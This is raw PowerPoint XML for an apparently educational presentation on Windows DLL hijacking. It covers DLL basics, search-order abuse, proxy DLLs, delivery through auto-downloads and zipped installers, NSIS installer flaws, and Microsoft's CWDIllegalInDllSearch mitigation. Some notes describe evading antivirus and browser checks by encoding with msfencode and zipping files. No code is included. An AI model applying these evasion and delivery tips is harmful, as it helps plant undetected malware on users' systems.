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6973" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="41" d="100"/>
          <a:sy n="41" d="100"/>
        </p:scale>
        <p:origin x="22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D64EE1-C211-45EB-B845-06ECCD68BB99}"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00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127266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u="sng" dirty="0" smtClean="0"/>
              <a:t>Overview and Background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- DLL - Dynamic-Link Library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Mechanism in windows to share code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- A specified DLL would be called by an exe file, so that the running process may use functions/resources that are present in the DLL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Additionally, DLLs can also link to other DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0" smtClean="0"/>
              <a:t>Why Use DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" dirty="0" smtClean="0"/>
              <a:t>- Allows for an optimal use of system memory. Should the same function be needed by various processes, a single DLL can be loaded into physical memory and shared between processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" dirty="0" smtClean="0"/>
              <a:t>- Not all associated libraries need to be loaded into memory if not needed, this further saves memory. For Ex. Word processing application that needs access to a printer DLL to print. The associated DLL will only be loaded when a print job is needed, and then unloaded once its task is complete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" u="none" dirty="0" smtClean="0"/>
              <a:t>- Allows for programs to be made modular, and makes for an easier way to upgrade software. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Some important DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NTDLL.DLL – Exports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the Windows Native API to calling applications. Used by native applications such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>csrss.exe, which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the first process to run before any user process can be created.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>KERNEL32.DLL − Gives a process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> access to Windows Base API, which includes access to functions that allow memory management, I/O, and process and thread creation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>USER32.DLL − Allows a process to implement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Windows User component. Allows a program to have a GUI which matches Windows native GUI. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="671094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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Need more complex tools to write a DLL which can go undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>All legitimate function calls will be forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to the legitimate DLL which handles these functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As a side we can have our own function calls used to compromise the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DLL export viewer allows us to see all functions within a DLL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Dependency walker allows us to see all DLLs a certain DLL may depend on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>i.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which functions its importing, exporting from other modules.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4019608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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Attackers main goal to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t> hijack then is to place a malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> DLL into a directory that appears higher up in the search order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Arguably not that difficult, happens all the time. Torrents, ads, malicious sites, porn sites</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Up until very recently, browsers,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> namely Chrome, would auto download a file to the default download directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Microsoft’s Edge browser still does so.</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CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In 2008, auto downloads in Safari browsers in MACs resulted in an issue known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Safari Carpet Bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Resulted in large amount of files automatically downloading if a malicious site is visited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Auto Downloads should not be a feature in browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Edge Browser,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> chrome, still download a compressed zip of the folders, even though they mention running scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is another vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Package installer and bad .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as an self extracting archive. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Browsers don’t seem to pick up any issues in compressed files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Should an A/V be put in place, it may be too late by the time a user has decided to run the installer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Can further prevent detection by obfuscating malicious file. Encode the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t> with random data, so that it’s signature is not detected by an A/V</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Zipping the file seems to be able to bypass browser detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a tool in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to encode files and prevent detection from an antivirus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" b="0" u="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" u="sng" baseline="0" dirty="0" smtClean="0"/>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CA" dirty="0" smtClean="0"/>
              <a:t>Problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> with keeping all downloaded files in a single place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One bad file may lead to multiple sources for a vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Directory Poisoning)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NSIS a tool which allows for creation of installers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NSIS installers all suffer from the same vulnerability.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dirty="0" smtClean="0"/>
              <a:t>Has low overhead, plugin support, easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to use. Largely replaced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>InstallSheild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NSIS is open-source, widely used. Used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google, Mozilla, OpenOffice.org, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FLStudio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BitTorrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Flickr, many more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Vulnerability still present in latest installers, as shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Supposedly an update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Released December 26, 2015 , NSIS 2.5 and beta 3 seem to address the issue of DLL hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Preloads libraries (static load) instead of dynamic load.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>http://sourceforge.net/projects/nsis/files/NSIS%202/2.50/RELEASE.html/view - Release Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OS or developer issue? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DLL hijacking has been around for at least 10 years.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD00153D-4E6D-41C0-8FAB-B8020432CC44}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1278113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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>In Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 7 and XP SP2+, initially the DLL search path was changed, however attacks were still possible, as was seen.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>From Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Knowledge Base KB 2264107, around 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>New registry entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>CWDIllegalInDllSearch:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>The update allowed administrators to define whether to include CWD in DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> search order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>on a system-wide or a per-application basis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> could also,</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Prevent an application from loading a library from a WebDAV location. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Prevent an application from loading a library from both a WebDAV, as well as a remote UNC location.  Ex) opening a word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> doc in a network share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Registry entry was:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\Control\Session Manager</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>https://support.microsoft.com/en-us/kb/2264107</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Article ID: 2264107 - Last Review: 06/21/2014 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Making</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> major Operating System changes at the time would have broken many legitimate applications (google searches for KB 2264107 indicate that this was the case) that depended on loading DLLs from the CWD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>See http://blogs.technet.com/b/msrc/archive/2010/08/31/update-on-security-advisory-2269673.aspx. Message from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Response Center on the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> effects of the update.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t>A large part of the blame in this issue was on unsafe code written by developers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Microsoft further reiterated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the importance of safe library loading to developers to prevent the possibility of such an attack, as part of the solutions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
